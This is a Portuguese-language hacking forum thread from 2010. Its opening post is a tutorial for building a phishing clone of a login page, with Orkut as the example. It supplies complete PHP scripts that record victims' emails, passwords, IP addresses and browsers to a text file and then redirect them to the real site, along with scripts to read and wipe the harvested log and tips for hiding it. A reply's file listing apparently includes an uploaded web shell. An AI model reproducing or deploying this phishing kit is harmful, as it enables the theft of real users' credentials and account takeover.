Criando uma página fake!

Iniciado por DarkGenesis, 14 de Novembro , 2010, 02:25:13 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

DarkGenesis

14 de Novembro , 2010, 02:25:13 PM
Esse tutorial vai te ensinar a criar uma página fake de qualquer site!
Para aqueles que não sabem o que é uma página fake...
  • Página fake é uma página falsa de login de um site, que rouba os dados das pessoas. Como por exemplo uma página fake de login de um banco (que possui a fução de roubar a senha dos usuários do banco).
    Nossa pagina fake funciona da seguinte maneira:
    1º - Você vai precisar de um arquivo HTML (o login.html) e mais alguns arquivos PHP
  • salva.php
  • apagar.php
  • ler.php
       Você vai upar todos os arquivos em um host free [www.110mb.com] e quando a vítima logar na página fake, os seus dados serão salvos em um arquivo "senhas.txt" no próprio host!
       Para ver esse arquivo, acesse o arquivo ler.php. E para apagar, acesse o arquivo apagar.php!
    Vamos lá! Primeiramente, entre na página de login de algum site (vamos pegar o Orkut como exemplo) e salve o html como login.html!
    Agora, entre no bloco de notas e crie os PHP's:
  • salva.php:
    Citar<?php
    $nomearquivo ="senhas.txt";
    $email =$_POST["VALOR DO INPUT DE LOGIN"];
    $senha =$_POST["VALOR DO INPUT DE SENHA"];
    $browser =$_SERVER['HTTP_USER_AGENT'];
    $ip =$_SERVER['REMOTE_ADDR'];
    $hostname =gethostbyaddr($ip);
    $data =date("Y-m-d");
    $hora =date("H:i:s");
    $traco ="<br><br>";
    $ess ="Email: ".$email."<br>Senha: ".$senha."<br>Navegador: ".$browser."<br>IP: ".$ip."<br>Nome do Host: ".$hostname."<br>Data: ".$data."<br>Hora: ".$hora."<br>".$traco;
    $abre =@fopen("senhas.txt","a ");
    $escreve =fwrite($abre, $ess);
    echo "<script>javascript:document.location='SITE DESEJADO'</script>";
    ?>
  • apagar.php:
    Citar<?php
    $fd = @fopen("senhas.txt","w") or die("arquivo inexistente");
    fpassthru($fd);
    ?>
  • ler.php:
    Citar<?php
    $fd = @fopen("senhas.txt","r") or die("Falta um arquivo no servidor!!");
    fpassthru($fd);
    ?>
    Agora, abra login.html com um editor de HTML, ou com o próprio bloco de notas, e ache o form de login. Esse form é um código que, geralmente, vem nos botões de "Entrar" ou "Login", que dá um endereço pra página ser redirecionada após o login (se o login for autenticado, ou seja, se o usuário e a senha estiverem certos). Geralmente, ele está escrito no seguinte código:
    Citar<form name="loginForm" action="..."
  • O endereço do Action muda de acordo com o site. Quando for assim, adicione um "Salva.php" no action!
    Citar<form name="loginForm" action="salva.php"
    Dica: O form quase sempre vem seguido do "Action", que significa uma ação que irá acontecer quando clicar no botão (ou quando a página for atualizada). Então, para achar o form de login, aperta Ctrl F e procura por "Action" no código fonte. Quando você ver que achou o form de login, você substitui o endereço do Action por salva.php. Em geral, é assim, mas em alguns casos, em vez de action, tem outros códigos (um deles é OnClick), mas fica fácil de achar, é so pesquisar bastante no código fonte.
  • No caso do Orkut, no código-fonte, o form está assim:
    Citar<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=orkut"
    -É só você trocar por:
    Citar<form id="gaia_loginform" action="salva.php"
    -Agora você procura, por perto do form, a parte do INPUT. Procura o INPUT de usuário e o INPUT de senha. O INPUT é o campo onde você digita a senha. Dica: a maioria dos inputs estao com type=HIDDEN (escondidos). Então, o INPUT que você vai procurar é o de inserir senha e login. Geralmente eles tem nome de LOGIN e PASSWORD. No código-fonte da página de login do Orkut é assim:
    Citar<input name="Email"
    e
    Citar<input name="passwd"
    Agora você pega os valores dos "input name", que no exemplo, é "username" e "password", abre o salva.php. Ele deve estar assim:
    Citar<?php
    $nomearquivo ="senhas.txt";
    $email =$_POST["VALOR DO INPUT DE LOGIN"];
    $senha =$_POST["VALOR DO INPUT DE SENHA"];
    $browser =$_SERVER['HTTP_USER_AGENT'];
    $ip =$_SERVER['REMOTE_ADDR'];
    $hostname =gethostbyaddr($ip);
    $data =date("Y-m-d");
    $hora =date("H:i:s");
    $traco ="<br><br>";
    $ess ="Email: ".$email."<br>Senha: ".$senha."<br>Navegador: ".$browser."<br>IP: ".$ip."<br>Nome do Host: ".$hostname."<br>Data: ".$data."<br>Hora: ".$hora."<br>".$traco;
    $abre =@fopen("senhas.txt","a ");
    $escreve =fwrite($abre, $ess);
    echo "<script>javascript:document.location='SITE DESEJADO'</script>";
    ?>
    Agora, você coloca na 2º e na 3º linha, entre aspas, os valores e na penúltima linha, coloque endereço do login Vai ficar assim:
    Citar<?php
    $nomearquivo ="senhas.txt";
    $email =$_POST["Email"];
    $senha =$_POST["passwd"];
    $browser =$_SERVER['HTTP_USER_AGENT'];
    $ip =$_SERVER['REMOTE_ADDR'];
    $hostname =gethostbyaddr($ip);
    $data =date("Y-m-d");
    $hora =date("H:i:s");
    $traco ="<br><br>";
    $ess ="Email: ".$email."<br>Senha: ".$senha."<br>Navegador: ".$browser."<br>IP: ".$ip."<br>Nome do Host: ".$hostname."<br>Data: ".$data."<br>Hora: ".$hora."<br>".$traco;
    $abre =@fopen("senhas.txt","a ");
    $escreve =fwrite($abre, $ess);
    echo "<script>javascript:document.location='http://www.orkut.com'</script>";
    ?>
    Salve e pronto!
    Agora você precisa saber a função de cada arquivo:
    -> login.htm: a página fake já com as modificações necessárias
    -> login_arquivos: imagens (geralmente, gifs e pngs) da página de login
    -> salva.php: arquivo php necessário pra página funcionar (salva senhas e logins no arquivo senhas.txt)
    -> ler.php: com esse arquivo é que você vai conseguir ver as senhas e logins (permite você visualizar o arquivo senhas.txt)
    -> apagar.php: com esse arquivo, você vai apagar as senhas e logins depois de ter guardado (apaga o arquivo senhas.txt)
    -> senhas.txt: o arquivo com as senhas que vâo ser salvas depois de alguem ter logado na página fake. Se você quiser dificultar o acesso de outras pessoas à sua página fake, mude "senhas.txt" e "ler.php", como por exemplo hell.php e hell.txt. Fica mais difícil de uma pessoa descobrir o link do log de senhas. Mas, para fazer isso, você vai ter que mudar o nome em todos os lugares, em todos phps e na página fake, que fazem referência à Salvar.txt e Ler.php.
    IMPORTANTE: Coloque todos os 4 arquivos juntos no mesmo diretório
    IMPORTANTE²: Crie uma pasta no diretorio onde vc fez o upload dos 4 arquivos e faça o upload dos arquivos que estao dentro da pasta login_Arquivos

killer.bat

#1
23 de Novembro , 2010, 09:57:41 AM Última edição: 23 de Novembro , 2010, 10:00:43 AM por killer.bat
E necessario dar permissão pra alterar no arquivo senhas.txt ? 8)

Pois o meu deu o seguinte erro.
Citar

"; $ess ="Email: ".$email."
Senha: ".$senha."
Navegador: ".$browser."
IP: ".$ip."
Nome do Host: ".$hostname."
Data: ".$data."
Hora: ".$hora."
".$traco; $abre =@fopen("senhas.txt","a "); $escreve =fwrite($abre, $ess); echo "

Esta hospedado em
http://admingaleon.hispavista.com
http://galeon.com/brasilbr/login.htm

Citarsenhas.txt           2010-11-23
      apagar.php       0.089 KB   2010-11-23
      itsecteam_shell.php       66.403 KB   2010-11-23
      ler.php       0.1 KB   2010-11-23
      login.htm   
    editar 
   19.328 KB   2010-11-23
      salva.php
Imprimir
Ir para o topo Páginas1
Ações